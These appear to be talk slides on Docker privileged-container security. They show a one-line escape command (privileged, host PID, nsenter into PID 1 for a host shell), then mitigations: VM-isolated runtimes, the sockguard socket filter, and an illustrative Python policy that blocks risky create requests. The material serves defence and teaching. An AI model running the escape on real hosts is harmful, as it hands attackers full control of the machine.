Privileged Containers

Privileged containers have access to all syscalls

Anyone who is able to start containers can simply leave the isolation:

docker run -it \
--privileged \
--pid=host \
alpine \
nsenter -t 1 -m -u -n -i sh

Parameters of nsenter

Taming Privileged Containers

For example

Isolates containers in a lightweight VM

Configured as a container runtime (instead of runc)

Docker Engine API Filter

For example sockguard

/sockguard -upstream-socket /var/run/docker-raw.sock -filename /var/run/docker.sock
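
The kind of check an Engine API filter applies to container-create requests, shown as an added example (it is not sockguard's code and not from the original slides). The field names come from the Docker Engine API HostConfig object; the policy, the function name and the sample requests are assumptions constructed for illustration.

```python
import json
import re

# POST /containers/create, with an optional API version prefix (/v1.43/...).
CREATE_RE = re.compile(r"^(/v\d+\.\d+)?/containers/create(\?.*)?$")

# Hypothetical policy: HostConfig namespace settings that share the host's view.
HOST_NAMESPACE_FIELDS = ("PidMode", "NetworkMode", "IpcMode", "UTSMode", "UsernsMode")


def violations(method, path, body):
    """Return the reasons a request is denied; an empty list means allow."""
    if method != "POST" or not CREATE_RE.match(path):
        return []  # this sketch only inspects container creation
    try:
        spec = json.loads(body)
    except ValueError:
        return ["unparseable body"]  # fail closed
    if not isinstance(spec, dict):
        return ["unparseable body"]
    host = spec.get("HostConfig")
    if not isinstance(host, dict):
        host = {}
    found = []
    if host.get("Privileged"):
        found.append("Privileged")
    for field in HOST_NAMESPACE_FIELDS:
        if host.get(field) == "host":
            found.append(field + "=host")
    if host.get("CapAdd"):
        found.append("CapAdd")
    for bind in host.get("Binds") or []:
        source = str(bind).split(":")[0]
        # Mounting the host root or the Docker socket bypasses the filter itself.
        if source == "/" or source.endswith("docker.sock"):
            found.append("Bind " + source)
    return found


# Constructed sample: the create request behind the docker run command above.
ESCAPE_REQUEST = json.dumps({
    "Image": "alpine",
    "Cmd": ["nsenter", "-t", "1", "-m", "-u", "-n", "-i", "sh"],
    "HostConfig": {"Privileged": True, "PidMode": "host"},
})
# Constructed sample: an ordinary container with default isolation.
BENIGN_REQUEST = json.dumps({"Image": "alpine", "Cmd": ["sh"],
                             "HostConfig": {"NetworkMode": "bridge"}})
```

A filter of this kind only helps when clients cannot reach the raw upstream socket directly.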